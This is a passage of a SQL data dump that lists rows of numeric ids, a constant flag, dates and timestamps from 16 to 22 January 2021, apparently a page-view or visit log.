18:49:43'),(11386,2309,1,'2021-01-16','2021-01-16 18:49:49'),(11387,2159,1,'2021-01-16','2021-01-16 18:55:31'),(11388,2159,1,'2021-01-16','2021-01-16 18:55:36'),(11389,1604,1,'2021-01-16','2021-01-16 20:09:42'),(11390,2309,1,'2021-01-16','2021-01-16 20:31:13'),(11391,2309,1,'2021-01-16','2021-01-16 21:11:07'),(11392,1747,1,'2021-01-16','2021-01-16 21:53:35'),(11393,3030,1,'2021-01-16','2021-01-16 22:08:31'),(11394,2159,1,'2021-01-16','2021-01-16 22:30:34'),(11395,2159,1,'2021-01-16','2021-01-16 22:40:37'),(11396,2159,1,'2021-01-16','2021-01-16 22:40:57'),(11397,2309,1,'2021-01-16','2021-01-16 22:49:42'),(11398,2159,1,'2021-01-16','2021-01-16 23:18:28'),(11399,2159,1,'2021-01-16','2021-01-16 23:18:40'),(11400,2159,1,'2021-01-16','2021-01-16 23:22:21'),(11401,2159,1,'2021-01-16','2021-01-16 23:23:29'),(11402,2609,1,'2021-01-16','2021-01-16 23:53:30'),(11403,2309,1,'2021-01-16','2021-01-16 23:53:51'),(11404,1695,1,'2021-01-17','2021-01-17 00:03:19'),(11405,570,1,'2021-01-17','2021-01-17 00:10:50'),(11406,89,1,'2021-01-17','2021-01-17 00:27:34'),(11407,1588,1,'2021-01-17','2021-01-17 00:51:01'),(11408,1870,1,'2021-01-17','2021-01-17 01:31:34'),(11409,2813,1,'2021-01-17','2021-01-17 01:35:46'),(11410,80,1,'2021-01-17','2021-01-17 01:41:30'),(11411,2769,1,'2021-01-17','2021-01-17 02:32:21'),(11412,1594,1,'2021-01-17','2021-01-17 02:45:06'),(11413,1586,1,'2021-01-17','2021-01-17 03:42:35'),(11414,2154,1,'2021-01-17','2021-01-17 03:57:31'),(11415,1582,1,'2021-01-17','2021-01-17 04:12:19'),(11416,1600,1,'2021-01-17','2021-01-17 04:42:14'),(11417,3127,1,'2021-01-17','2021-01-17 04:42:33'),(11418,3285,1,'2021-01-17','2021-01-17 06:26:22'),(11419,3058,1,'2021-01-17','2021-01-17 07:40:18'),(11420,2309,1,'2021-01-17','2021-01-17 08:16:53'),(11421,2309,1,'2021-01-17','2021-01-17 08:27:09'),(11422,2309,1,'2021-01-17','2021-01-17 08:27:30'),(11423,2309,1,'2021-01-17','2021-01-17 08:27:31'),(11424,1594,1,'2021-01-17','2021-01-17 09:11:28'),(11425,74,1,'2021-01-17','2021-01-17 09:24:29'),(11426,1614,1,'2021-01-17','2021-01-17 09:43:30'),(11427,2309,1,'2021-01-17','2021-01-17 10:03:37'),(11428,2904,1,'2021-01-17','2021-01-17 10:13:42'),(11429,2159,1,'2021-01-17','2021-01-17 10:23:51'),(11430,1606,1,'2021-01-17','2021-01-17 10:49:21'),(11431,1612,1,'2021-01-17','2021-01-17 11:32:01'),(11432,2297,1,'2021-01-17','2021-01-17 11:36:42'),(11433,2457,1,'2021-01-17','2021-01-17 11:44:45'),(11434,2159,1,'2021-01-17','2021-01-17 11:52:46'),(11435,2159,1,'2021-01-17','2021-01-17 11:55:02'),(11436,2159,1,'2021-01-17','2021-01-17 11:55:20'),(11437,2309,1,'2021-01-17','2021-01-17 12:15:29'),(11438,3099,1,'2021-01-17','2021-01-17 12:24:53'),(11439,2159,1,'2021-01-17','2021-01-17 12:53:00'),(11440,2159,1,'2021-01-17','2021-01-17 12:55:08'),(11441,1588,1,'2021-01-17','2021-01-17 13:44:59'),(11442,2159,1,'2021-01-17','2021-01-17 13:51:17'),(11443,1604,1,'2021-01-17','2021-01-17 13:54:44'),(11444,2159,1,'2021-01-17','2021-01-17 13:56:01'),(11445,2503,1,'2021-01-17','2021-01-17 13:56:26'),(11446,2159,1,'2021-01-17','2021-01-17 13:56:46'),(11447,3280,1,'2021-01-17','2021-01-17 13:56:48'),(11448,2159,1,'2021-01-17','2021-01-17 13:56:50'),(11449,2159,1,'2021-01-17','2021-01-17 13:57:13'),(11450,2159,1,'2021-01-17','2021-01-17 13:57:56'),(11451,1718,1,'2021-01-17','2021-01-17 14:14:45'),(11452,1598,1,'2021-01-17','2021-01-17 14:24:57'),(11453,3069,1,'2021-01-17','2021-01-17 14:35:30'),(11454,1600,1,'2021-01-17','2021-01-17 14:52:04'),(11455,2159,1,'2021-01-17','2021-01-17 15:09:59'),(11456,2309,1,'2021-01-17','2021-01-17 15:10:53'),(11457,2309,1,'2021-01-17','2021-01-17 15:15:31'),(11458,2309,1,'2021-01-17','2021-01-17 15:16:23'),(11459,2159,1,'2021-01-17','2021-01-17 15:20:17'),(11460,468,1,'2021-01-17','2021-01-17 15:45:20'),(11461,2769,1,'2021-01-17','2021-01-17 15:55:21'),(11462,1594,1,'2021-01-17','2021-01-17 16:05:38'),(11463,3127,1,'2021-01-17','2021-01-17 16:29:21'),(11464,1870,1,'2021-01-17','2021-01-17 16:35:39'),(11465,2309,1,'2021-01-17','2021-01-17 16:47:34'),(11466,2309,1,'2021-01-17','2021-01-17 16:51:32'),(11467,2159,1,'2021-01-17','2021-01-17 16:56:13'),(11468,3030,1,'2021-01-17','2021-01-17 17:08:28'),(11469,3030,1,'2021-01-17','2021-01-17 17:09:46'),(11470,3069,1,'2021-01-17','2021-01-17 18:01:59'),(11471,1594,1,'2021-01-17','2021-01-17 18:22:42'),(11472,89,1,'2021-01-17','2021-01-17 18:45:39'),(11473,2309,1,'2021-01-17','2021-01-17 19:41:01'),(11474,2159,1,'2021-01-17','2021-01-17 19:53:00'),(11475,2609,1,'2021-01-17','2021-01-17 20:05:53'),(11476,2159,1,'2021-01-17','2021-01-17 20:14:57'),(11477,91,1,'2021-01-17','2021-01-17 20:15:47'),(11478,1612,1,'2021-01-17','2021-01-17 20:25:59'),(11479,2751,1,'2021-01-17','2021-01-17 20:46:16'),(11480,2159,1,'2021-01-17','2021-01-17 20:49:14'),(11481,2159,1,'2021-01-17','2021-01-17 20:49:19'),(11482,1604,1,'2021-01-17','2021-01-17 21:04:48'),(11483,91,1,'2021-01-17','2021-01-17 21:05:59'),(11484,2309,1,'2021-01-17','2021-01-17 21:34:49'),(11485,2309,1,'2021-01-17','2021-01-17 21:35:10'),(11486,2309,1,'2021-01-17','2021-01-17 21:36:41'),(11487,2309,1,'2021-01-17','2021-01-17 21:37:08'),(11488,2159,1,'2021-01-17','2021-01-17 21:49:17'),(11489,469,1,'2021-01-17','2021-01-17 22:17:52'),(11490,473,1,'2021-01-17','2021-01-17 22:35:48'),(11491,2309,1,'2021-01-17','2021-01-17 22:42:29'),(11492,1592,1,'2021-01-17','2021-01-17 23:08:46'),(11493,1718,1,'2021-01-17','2021-01-17 23:31:39'),(11494,2309,1,'2021-01-17','2021-01-17 23:50:06'),(11495,2309,1,'2021-01-17','2021-01-17 23:50:19'),(11496,2751,1,'2021-01-17','2021-01-17 23:52:02'),(11497,1604,1,'2021-01-17','2021-01-17 23:55:53'),(11498,2309,1,'2021-01-18','2021-01-18 00:07:09'),(11499,1586,1,'2021-01-18','2021-01-18 00:56:42'),(11500,3058,1,'2021-01-18','2021-01-18 01:49:48'),(11501,1718,1,'2021-01-18','2021-01-18 01:57:51'),(11502,1588,1,'2021-01-18','2021-01-18 02:09:40'),(11503,1594,1,'2021-01-18','2021-01-18 02:47:33'),(11504,3083,1,'2021-01-18','2021-01-18 02:58:07'),(11505,3045,1,'2021-01-18','2021-01-18 03:26:58'),(11506,2617,1,'2021-01-18','2021-01-18 03:27:58'),(11507,1596,1,'2021-01-18','2021-01-18 04:27:46'),(11508,2309,1,'2021-01-18','2021-01-18 05:36:06'),(11509,1582,1,'2021-01-18','2021-01-18 07:40:13'),(11510,3090,1,'2021-01-18','2021-01-18 08:16:01'),(11511,1598,1,'2021-01-18','2021-01-18 09:47:15'),(11512,3127,1,'2021-01-18','2021-01-18 09:47:31'),(11513,1598,1,'2021-01-18','2021-01-18 09:49:15'),(11514,80,1,'2021-01-18','2021-01-18 09:49:20'),(11515,2904,1,'2021-01-18','2021-01-18 09:50:11'),(11516,2904,1,'2021-01-18','2021-01-18 09:51:21'),(11517,2609,1,'2021-01-18','2021-01-18 10:05:37'),(11518,80,1,'2021-01-18','2021-01-18 10:06:03'),(11519,80,1,'2021-01-18','2021-01-18 10:08:16'),(11520,1584,1,'2021-01-18','2021-01-18 10:25:28'),(11521,1598,1,'2021-01-18','2021-01-18 10:28:00'),(11522,72,1,'2021-01-18','2021-01-18 10:34:00'),(11523,1582,1,'2021-01-18','2021-01-18 10:35:31'),(11524,2159,1,'2021-01-18','2021-01-18 10:38:27'),(11525,2159,1,'2021-01-18','2021-01-18 10:38:54'),(11526,3307,1,'2021-01-18','2021-01-18 10:41:46'),(11527,2904,1,'2021-01-18','2021-01-18 10:42:49'),(11528,2904,1,'2021-01-18','2021-01-18 10:46:48'),(11529,2904,1,'2021-01-18','2021-01-18 10:47:45'),(11530,68,1,'2021-01-18','2021-01-18 10:51:10'),(11531,2159,1,'2021-01-18','2021-01-18 10:52:48'),(11532,2159,1,'2021-01-18','2021-01-18 10:53:53'),(11533,2159,1,'2021-01-18','2021-01-18 10:53:58'),(11534,1600,1,'2021-01-18','2021-01-18 11:05:15'),(11535,80,1,'2021-01-18','2021-01-18 11:15:10'),(11536,570,1,'2021-01-18','2021-01-18 11:15:15'),(11537,3030,1,'2021-01-18','2021-01-18 11:15:16'),(11538,1586,1,'2021-01-18','2021-01-18 11:51:33'),(11539,2309,1,'2021-01-18','2021-01-18 12:15:53'),(11540,3107,1,'2021-01-18','2021-01-18 12:40:53'),(11541,1614,1,'2021-01-18','2021-01-18 13:05:32'),(11542,2309,1,'2021-01-18','2021-01-18 13:10:25'),(11543,2309,1,'2021-01-18','2021-01-18 13:10:50'),(11544,3226,1,'2021-01-18','2021-01-18 13:15:26'),(11545,3127,1,'2021-01-18','2021-01-18 13:23:56'),(11546,1608,1,'2021-01-18','2021-01-18 14:14:23'),(11547,2457,1,'2021-01-18','2021-01-18 14:46:15'),(11548,2309,1,'2021-01-18','2021-01-18 15:00:17'),(11549,80,1,'2021-01-18','2021-01-18 15:18:19'),(11550,1604,1,'2021-01-18','2021-01-18 15:26:26'),(11551,3124,1,'2021-01-18','2021-01-18 15:43:50'),(11552,2159,1,'2021-01-18','2021-01-18 15:54:30'),(11553,2159,1,'2021-01-18','2021-01-18 15:59:20'),(11554,2159,1,'2021-01-18','2021-01-18 16:04:13'),(11555,2159,1,'2021-01-18','2021-01-18 16:06:40'),(11556,1718,1,'2021-01-18','2021-01-18 16:11:04'),(11557,1594,1,'2021-01-18','2021-01-18 16:11:19'),(11558,80,1,'2021-01-18','2021-01-18 16:12:43'),(11559,1594,1,'2021-01-18','2021-01-18 16:13:34'),(11560,1594,1,'2021-01-18','2021-01-18 16:21:01'),(11561,2309,1,'2021-01-18','2021-01-18 16:39:22'),(11562,2309,1,'2021-01-18','2021-01-18 16:40:22'),(11563,2309,1,'2021-01-18','2021-01-18 16:54:04'),(11564,468,1,'2021-01-18','2021-01-18 16:56:43'),(11565,2159,1,'2021-01-18','2021-01-18 16:56:58'),(11566,2309,1,'2021-01-18','2021-01-18 17:27:05'),(11567,3109,1,'2021-01-18','2021-01-18 17:57:06'),(11568,91,1,'2021-01-18','2021-01-18 18:00:32'),(11569,1747,1,'2021-01-18','2021-01-18 18:01:50'),(11570,91,1,'2021-01-18','2021-01-18 18:08:34'),(11571,2159,1,'2021-01-18','2021-01-18 18:11:35'),(11572,2813,1,'2021-01-18','2021-01-18 19:23:10'),(11573,570,1,'2021-01-18','2021-01-18 19:47:44'),(11574,2904,1,'2021-01-18','2021-01-18 19:59:57'),(11575,72,1,'2021-01-18','2021-01-18 20:00:02'),(11576,87,1,'2021-01-18','2021-01-18 20:00:03'),(11577,3127,1,'2021-01-18','2021-01-18 20:00:10'),(11578,68,1,'2021-01-18','2021-01-18 20:00:16'),(11579,80,1,'2021-01-18','2021-01-18 20:00:22'),(11580,3313,1,'2021-01-18','2021-01-18 20:00:23'),(11581,474,1,'2021-01-18','2021-01-18 20:00:25'),(11582,3280,1,'2021-01-18','2021-01-18 20:00:26'),(11583,3307,1,'2021-01-18','2021-01-18 20:00:35'),(11584,2503,1,'2021-01-18','2021-01-18 20:00:41'),(11585,84,1,'2021-01-18','2021-01-18 20:00:42'),(11586,76,1,'2021-01-18','2021-01-18 20:00:47'),(11587,3287,1,'2021-01-18','2021-01-18 20:00:52'),(11588,470,1,'2021-01-18','2021-01-18 20:01:01'),(11589,3282,1,'2021-01-18','2021-01-18 20:02:17'),(11590,3316,1,'2021-01-18','2021-01-18 20:02:25'),(11591,3316,1,'2021-01-18','2021-01-18 20:02:27'),(11592,91,1,'2021-01-18','2021-01-18 20:02:30'),(11593,1718,1,'2021-01-18','2021-01-18 20:27:14'),(11594,3282,1,'2021-01-18','2021-01-18 21:01:16'),(11595,1582,1,'2021-01-18','2021-01-18 21:27:27'),(11596,1776,1,'2021-01-18','2021-01-18 21:45:55'),(11597,1588,1,'2021-01-18','2021-01-18 22:07:54'),(11598,474,1,'2021-01-18','2021-01-18 22:27:53'),(11599,1586,1,'2021-01-18','2021-01-18 22:34:40'),(11600,80,1,'2021-01-18','2021-01-18 22:36:29'),(11601,1586,1,'2021-01-18','2021-01-18 22:37:04'),(11602,1614,1,'2021-01-18','2021-01-18 22:38:24'),(11603,1612,1,'2021-01-18','2021-01-18 22:58:41'),(11604,477,1,'2021-01-18','2021-01-18 23:08:50'),(11605,3030,1,'2021-01-18','2021-01-18 23:33:13'),(11606,2804,1,'2021-01-19','2021-01-19 00:53:00'),(11607,76,1,'2021-01-19','2021-01-19 01:49:34'),(11608,1774,1,'2021-01-19','2021-01-19 02:59:37'),(11609,3280,1,'2021-01-19','2021-01-19 03:19:28'),(11610,3245,1,'2021-01-19','2021-01-19 03:39:11'),(11611,1604,1,'2021-01-19','2021-01-19 03:59:33'),(11612,1695,1,'2021-01-19','2021-01-19 04:45:12'),(11613,1598,1,'2021-01-19','2021-01-19 05:30:07'),(11614,3005,1,'2021-01-19','2021-01-19 05:39:55'),(11615,1877,1,'2021-01-19','2021-01-19 05:50:09'),(11616,1741,1,'2021-01-19','2021-01-19 06:46:41'),(11617,2609,1,'2021-01-19','2021-01-19 07:00:37'),(11618,2419,1,'2021-01-19','2021-01-19 08:11:29'),(11619,3253,1,'2021-01-19','2021-01-19 08:41:37'),(11620,1718,1,'2021-01-19','2021-01-19 09:22:19'),(11621,1872,1,'2021-01-19','2021-01-19 09:42:18'),(11622,3127,1,'2021-01-19','2021-01-19 10:22:32'),(11623,91,1,'2021-01-19','2021-01-19 10:27:27'),(11624,76,1,'2021-01-19','2021-01-19 11:13:18'),(11625,2904,1,'2021-01-19','2021-01-19 11:23:29'),(11626,1594,1,'2021-01-19','2021-01-19 11:30:31'),(11627,1594,1,'2021-01-19','2021-01-19 11:33:57'),(11628,3069,1,'2021-01-19','2021-01-19 11:43:20'),(11629,1588,1,'2021-01-19','2021-01-19 12:03:36'),(11630,2457,1,'2021-01-19','2021-01-19 12:53:43'),(11631,1586,1,'2021-01-19','2021-01-19 13:11:50'),(11632,68,1,'2021-01-19','2021-01-19 13:15:19'),(11633,2410,1,'2021-01-19','2021-01-19 13:21:12'),(11634,2309,1,'2021-01-19','2021-01-19 13:36:34'),(11635,2309,1,'2021-01-19','2021-01-19 13:38:02'),(11636,1718,1,'2021-01-19','2021-01-19 13:43:49'),(11637,1606,1,'2021-01-19','2021-01-19 13:57:20'),(11638,76,1,'2021-01-19','2021-01-19 14:06:30'),(11639,68,1,'2021-01-19','2021-01-19 14:10:19'),(11640,1586,1,'2021-01-19','2021-01-19 14:13:26'),(11641,2503,1,'2021-01-19','2021-01-19 14:23:33'),(11642,1594,1,'2021-01-19','2021-01-19 14:24:51'),(11643,3287,1,'2021-01-19','2021-01-19 14:28:51'),(11644,1594,1,'2021-01-19','2021-01-19 14:29:15'),(11645,76,1,'2021-01-19','2021-01-19 14:30:21'),(11646,1594,1,'2021-01-19','2021-01-19 14:31:15'),(11647,1594,1,'2021-01-19','2021-01-19 14:31:44'),(11648,470,1,'2021-01-19','2021-01-19 14:33:55'),(11649,2159,1,'2021-01-19','2021-01-19 14:48:37'),(11650,2309,1,'2021-01-19','2021-01-19 14:54:47'),(11651,76,1,'2021-01-19','2021-01-19 14:56:05'),(11652,2309,1,'2021-01-19','2021-01-19 15:02:08'),(11653,3006,1,'2021-01-19','2021-01-19 15:04:26'),(11654,3041,1,'2021-01-19','2021-01-19 15:05:33'),(11655,3041,1,'2021-01-19','2021-01-19 15:05:46'),(11656,76,1,'2021-01-19','2021-01-19 15:06:06'),(11657,2769,1,'2021-01-19','2021-01-19 15:06:30'),(11658,2775,1,'2021-01-19','2021-01-19 15:06:58'),(11659,2769,1,'2021-01-19','2021-01-19 15:07:51'),(11660,76,1,'2021-01-19','2021-01-19 15:08:00'),(11661,76,1,'2021-01-19','2021-01-19 15:09:51'),(11662,3316,1,'2021-01-19','2021-01-19 15:10:52'),(11663,84,1,'2021-01-19','2021-01-19 15:12:33'),(11664,1877,1,'2021-01-19','2021-01-19 15:13:14'),(11665,91,1,'2021-01-19','2021-01-19 15:13:54'),(11666,1718,1,'2021-01-19','2021-01-19 15:22:15'),(11667,1877,1,'2021-01-19','2021-01-19 15:27:25'),(11668,3087,1,'2021-01-19','2021-01-19 15:29:32'),(11669,1718,1,'2021-01-19','2021-01-19 15:31:39'),(11670,68,1,'2021-01-19','2021-01-19 16:26:27'),(11671,72,1,'2021-01-19','2021-01-19 16:26:42'),(11672,80,1,'2021-01-19','2021-01-19 16:28:09'),(11673,1598,1,'2021-01-19','2021-01-19 17:26:36'),(11674,80,1,'2021-01-19','2021-01-19 17:51:13'),(11675,68,1,'2021-01-19','2021-01-19 17:54:46'),(11676,1592,1,'2021-01-19','2021-01-19 18:05:10'),(11677,76,1,'2021-01-19','2021-01-19 18:07:13'),(11678,1606,1,'2021-01-19','2021-01-19 18:07:19'),(11679,1614,1,'2021-01-19','2021-01-19 18:15:20'),(11680,1870,1,'2021-01-19','2021-01-19 18:25:22'),(11681,2159,1,'2021-01-19','2021-01-19 19:23:29'),(11682,72,1,'2021-01-19','2021-01-19 19:45:30'),(11683,2769,1,'2021-01-19','2021-01-19 19:55:59'),(11684,1582,1,'2021-01-19','2021-01-19 21:07:12'),(11685,2159,1,'2021-01-19','2021-01-19 21:44:10'),(11686,2159,1,'2021-01-19','2021-01-19 21:45:11'),(11687,2751,1,'2021-01-19','2021-01-19 21:46:52'),(11688,2309,1,'2021-01-19','2021-01-19 22:03:06'),(11689,2159,1,'2021-01-19','2021-01-19 22:07:42'),(11690,2769,1,'2021-01-19','2021-01-19 22:08:36'),(11691,108,1,'2021-01-19','2021-01-19 23:26:11'),(11692,1582,1,'2021-01-20','2021-01-20 00:24:14'),(11693,1582,1,'2021-01-20','2021-01-20 01:50:16'),(11694,2704,1,'2021-01-20','2021-01-20 02:14:36'),(11695,1606,1,'2021-01-20','2021-01-20 02:37:36'),(11696,1586,1,'2021-01-20','2021-01-20 03:34:48'),(11697,91,1,'2021-01-20','2021-01-20 03:35:37'),(11698,335,1,'2021-01-20','2021-01-20 03:38:31'),(11699,68,1,'2021-01-20','2021-01-20 03:38:57'),(11700,87,1,'2021-01-20','2021-01-20 03:40:20'),(11701,87,1,'2021-01-20','2021-01-20 03:41:50'),(11702,68,1,'2021-01-20','2021-01-20 03:41:54'),(11703,335,1,'2021-01-20','2021-01-20 03:41:56'),(11704,91,1,'2021-01-20','2021-01-20 03:42:05'),(11705,1586,1,'2021-01-20','2021-01-20 03:42:09'),(11706,1582,1,'2021-01-20','2021-01-20 05:18:52'),(11707,2154,1,'2021-01-20','2021-01-20 05:28:20'),(11708,2248,1,'2021-01-20','2021-01-20 06:54:17'),(11709,1606,1,'2021-01-20','2021-01-20 06:57:08'),(11710,2309,1,'2021-01-20','2021-01-20 07:52:48'),(11711,2154,1,'2021-01-20','2021-01-20 08:19:55'),(11712,1718,1,'2021-01-20','2021-01-20 09:18:29'),(11713,1598,1,'2021-01-20','2021-01-20 09:18:35'),(11714,68,1,'2021-01-20','2021-01-20 09:20:18'),(11715,1598,1,'2021-01-20','2021-01-20 09:21:05'),(11716,1598,1,'2021-01-20','2021-01-20 09:21:35'),(11717,1598,1,'2021-01-20','2021-01-20 09:30:30'),(11718,108,1,'2021-01-20','2021-01-20 10:10:31'),(11719,91,1,'2021-01-20','2021-01-20 10:39:46'),(11720,2609,1,'2021-01-20','2021-01-20 10:43:47'),(11721,1709,1,'2021-01-20','2021-01-20 10:50:39'),(11722,2297,1,'2021-01-20','2021-01-20 11:30:19'),(11723,2309,1,'2021-01-20','2021-01-20 11:46:45'),(11724,2309,1,'2021-01-20','2021-01-20 11:47:04'),(11725,2309,1,'2021-01-20','2021-01-20 11:47:29'),(11726,1586,1,'2021-01-20','2021-01-20 12:04:49'),(11727,89,1,'2021-01-20','2021-01-20 12:36:33'),(11728,1596,1,'2021-01-20','2021-01-20 13:08:22'),(11729,1596,1,'2021-01-20','2021-01-20 13:08:31'),(11730,1718,1,'2021-01-20','2021-01-20 13:25:17'),(11731,1614,1,'2021-01-20','2021-01-20 13:53:08'),(11732,91,1,'2021-01-20','2021-01-20 14:26:25'),(11733,1722,1,'2021-01-20','2021-01-20 14:27:59'),(11734,91,1,'2021-01-20','2021-01-20 14:28:14'),(11735,1718,1,'2021-01-20','2021-01-20 14:28:39'),(11736,91,1,'2021-01-20','2021-01-20 14:31:43'),(11737,1720,1,'2021-01-20','2021-01-20 14:34:44'),(11738,91,1,'2021-01-20','2021-01-20 14:36:26'),(11739,89,1,'2021-01-20','2021-01-20 15:27:19'),(11740,102,1,'2021-01-20','2021-01-20 16:28:21'),(11741,1596,1,'2021-01-20','2021-01-20 16:28:52'),(11742,2309,1,'2021-01-20','2021-01-20 16:37:25'),(11743,1600,1,'2021-01-20','2021-01-20 17:10:53'),(11744,1582,1,'2021-01-20','2021-01-20 17:59:51'),(11745,1582,1,'2021-01-20','2021-01-20 18:04:29'),(11746,91,1,'2021-01-20','2021-01-20 19:09:57'),(11747,3090,1,'2021-01-20','2021-01-20 19:57:58'),(11748,2161,1,'2021-01-20','2021-01-20 19:59:12'),(11749,2309,1,'2021-01-20','2021-01-20 20:23:06'),(11750,2309,1,'2021-01-20','2021-01-20 20:23:36'),(11751,487,1,'2021-01-20','2021-01-20 20:32:16'),(11752,2248,1,'2021-01-20','2021-01-20 20:58:20'),(11753,2159,1,'2021-01-20','2021-01-20 23:50:15'),(11754,1586,1,'2021-01-21','2021-01-21 01:35:26'),(11755,2159,1,'2021-01-21','2021-01-21 02:10:37'),(11756,1592,1,'2021-01-21','2021-01-21 03:09:53'),(11757,1594,1,'2021-01-21','2021-01-21 05:22:33'),(11758,1718,1,'2021-01-21','2021-01-21 05:49:19'),(11759,487,1,'2021-01-21','2021-01-21 06:06:08'),(11760,1582,1,'2021-01-21','2021-01-21 06:26:22'),(11761,3092,1,'2021-01-21','2021-01-21 06:39:25'),(11762,2309,1,'2021-01-21','2021-01-21 06:50:52'),(11763,2769,1,'2021-01-21','2021-01-21 07:16:04'),(11764,1614,1,'2021-01-21','2021-01-21 07:27:33'),(11765,2769,1,'2021-01-21','2021-01-21 08:42:17'),(11766,1600,1,'2021-01-21','2021-01-21 08:50:00'),(11767,1598,1,'2021-01-21','2021-01-21 09:30:22'),(11768,2293,1,'2021-01-21','2021-01-21 09:46:58'),(11769,91,1,'2021-01-21','2021-01-21 11:02:41'),(11770,1600,1,'2021-01-21','2021-01-21 11:44:52'),(11771,1604,1,'2021-01-21','2021-01-21 11:56:05'),(11772,80,1,'2021-01-21','2021-01-21 11:56:16'),(11773,2410,1,'2021-01-21','2021-01-21 11:56:22'),(11774,2411,1,'2021-01-21','2021-01-21 11:56:38'),(11775,2419,1,'2021-01-21','2021-01-21 11:57:06'),(11776,1604,1,'2021-01-21','2021-01-21 11:57:12'),(11777,1604,1,'2021-01-21','2021-01-21 11:58:44'),(11778,1604,1,'2021-01-21','2021-01-21 11:59:18'),(11779,1604,1,'2021-01-21','2021-01-21 12:00:08'),(11780,1604,1,'2021-01-21','2021-01-21 12:09:50'),(11781,1604,1,'2021-01-21','2021-01-21 12:18:34'),(11782,2159,1,'2021-01-21','2021-01-21 12:22:37'),(11783,1600,1,'2021-01-21','2021-01-21 12:27:16'),(11784,80,1,'2021-01-21','2021-01-21 12:27:42'),(11785,2159,1,'2021-01-21','2021-01-21 12:29:34'),(11786,1604,1,'2021-01-21','2021-01-21 12:43:18'),(11787,1582,1,'2021-01-21','2021-01-21 13:48:15'),(11788,1606,1,'2021-01-21','2021-01-21 13:50:26'),(11789,1606,1,'2021-01-21','2021-01-21 13:50:27'),(11790,3005,1,'2021-01-21','2021-01-21 14:19:28'),(11791,2309,1,'2021-01-21','2021-01-21 15:03:35'),(11792,1604,1,'2021-01-21','2021-01-21 15:08:37'),(11793,1604,1,'2021-01-21','2021-01-21 15:51:33'),(11794,1600,1,'2021-01-21','2021-01-21 16:01:35'),(11795,1604,1,'2021-01-21','2021-01-21 16:05:57'),(11796,1604,1,'2021-01-21','2021-01-21 16:06:12'),(11797,1604,1,'2021-01-21','2021-01-21 16:06:21'),(11798,1586,1,'2021-01-21','2021-01-21 16:32:48'),(11799,68,1,'2021-01-21','2021-01-21 16:33:24'),(11800,76,1,'2021-01-21','2021-01-21 16:33:47'),(11801,87,1,'2021-01-21','2021-01-21 16:34:06'),(11802,487,1,'2021-01-21','2021-01-21 16:35:21'),(11803,76,1,'2021-01-21','2021-01-21 16:36:19'),(11804,487,1,'2021-01-21','2021-01-21 16:36:24'),(11805,68,1,'2021-01-21','2021-01-21 16:36:46'),(11806,87,1,'2021-01-21','2021-01-21 16:39:06'),(11807,3127,1,'2021-01-21','2021-01-21 18:35:22'),(11808,3117,1,'2021-01-21','2021-01-21 18:36:21'),(11809,3127,1,'2021-01-21','2021-01-21 18:36:27'),(11810,1598,1,'2021-01-22','2021-01-22 00:32:13'),(11811,1598,1,'2021-01-22','2021-01-22 00:37:15'),(11812,1598,1,'2021-01-22','2021-01-22 00:49:42'),(11813,89,1,'2021-01-22','2021-01-22 02:21:18'),(11814,1610,1,'2021-01-22','2021-01-22 05:51:37'),(11815,1598,1,'2021-01-22','2021-01-22 07:55:15'),(11816,2904,1,'2021-01-22','2021-01-22 07:55:55'),(11817,2904,1,'2021-01-22','2021-01-22 08:10:38'),(11818,1598,1,'2021-01-22','2021-01-22 08:27:15'),(11819,1588,1,'2021-01-22','2021-01-22 08:28:10'),(11820,1598,1,'2021-01-22','2021-01-22 08:37:32'),(11821,1598,1,'2021-01-22','2021-01-22 08:38:34'),(11822,1586,1,'2021-01-22','2021-01-22 09:41:10'),(11823,68,1,'2021-01-22','2021-01-22 09:44:17'),(11824,1544,1,'2021-01-22','2021-01-22 09:55:19'),(11825,80,1,'2021-01-22','2021-01-22 10:10:21'),(11826,2971,1,'2021-01-22','2021-01-22 10:34:24'),(11827,3261,1,'2021-01-22','2021-01-22 10:39:23'),(11828,1600,1,'2021-01-22','2021-01-22 10:45:19'),(11829,2769,1,'2021-01-22','2021-01-22 10:54:50'),(11830,2769,1,'2021-01-22','2021-01-22 11:04:51'),(11831,2769,1,'2021-01-22','2021-01-22 11:05:05'),(11832,108,1,'2021-01-22','2021-01-22 11:24:51'),(11833,3005,1,'2021-01-22','2021-01-22 11:24:55'),(11834,80,1,'2021-01-22','2021-01-22 11:42:01'),(11835,2419,1,'2021-01-22','2021-01-22 11:42:08'),(11836,80,1,'2021-01-22','2021-01-22 11:52:28'),(11837,2769,1,'2021-01-22','2021-01-22 12:20:33'),(11838,1586,1,'2021-01-22','2021-01-22 12:20:33'),(11839,1596,1,'2021-01-22','2021-01-22 12:20:35'),(11840,80,1,'2021-01-22','2021-01-22 12:21:15'),(11841,80,1,'2021-01-22','2021-01-22 12:21:54'),(11842,2769,1,'2021-01-22','2021-01-22 12:21:58'),(11843,91,1,'2021-01-22','2021-01-22 12:45:21'),(11844,1766,1,'2021-01-22','2021-01-22 12:55:14'),(11845,2411,1,'2021-01-22','2021-01-22 13:45:54'),(11846,1612,1,'2021-01-22','2021-01-22 13:55:51'),(11847,2309,1,'2021-01-22','2021-01-22 14:36:19'),(11848,1600,1,'2021-01-22','2021-01-22 14:39:32'),(11849,1588,1,'2021-01-22','2021-01-22 14:46:10'),(11850,3282,1,'2021-01-22','2021-01-22 15:52:28'),(11851,1594,1,'2021-01-22','2021-01-22 15:56:31'),(11852,1600,1,'2021-01-22','2021-01-22 15:58:43'),(11853,80,1,'2021-01-22','2021-01-22 16:00:56'),(11854,1614,1,'2021-01-22','2021-01-22 16:36:10'),(11855,3307,1,'2021-01-22','2021-01-22 17:06:35'),(11856,2813,1,'2021-01-22','2021-01-22 17:34:37'),(11857,1606,1,'2021-01-22','2021-01-22 17:50:56'),(11858,2769,1,'2021-01-22','2021-01-22 18:23:30'),(11859,2159,1,'2021-01-22','2021-01-22 19:17:07'),(11860,1600,1,'2021-01-22','2021-01-22 19:23:15'),(11861,80,1,'2021-01-22','2021-01-22 19:25:45'),(11862,76,1,'2021-01-22','2021-01-22 19:28:48'),(11863,2751,1,'2021-01-22','2021-01-22 19:57:23'),(11864,1600,1,'2021-01-22','2021-01-22 20:07:36'),(11865,1608,1,'2021-01-22','2021-01-22 20:29:38'),(11866,2558,1,'2021-01-22','2021-01-22 20:30:45'),(11867,1608,1,'2021-01-22','2021-01-22 20:31:39'),(11868,87,1,'2021-01-22','2021-01-22 20:37:40'),(11869,570,1,'2021-01-22','2021-01-22 20:47:54'),(11870,2801,1,'2021-01-22','2021-01-22 21:24:20'),(11871,3045,1,'2021-01-22','2021-01-22 22:15:16'),(11872,2178,1,'2021-01-22','2021-01-22 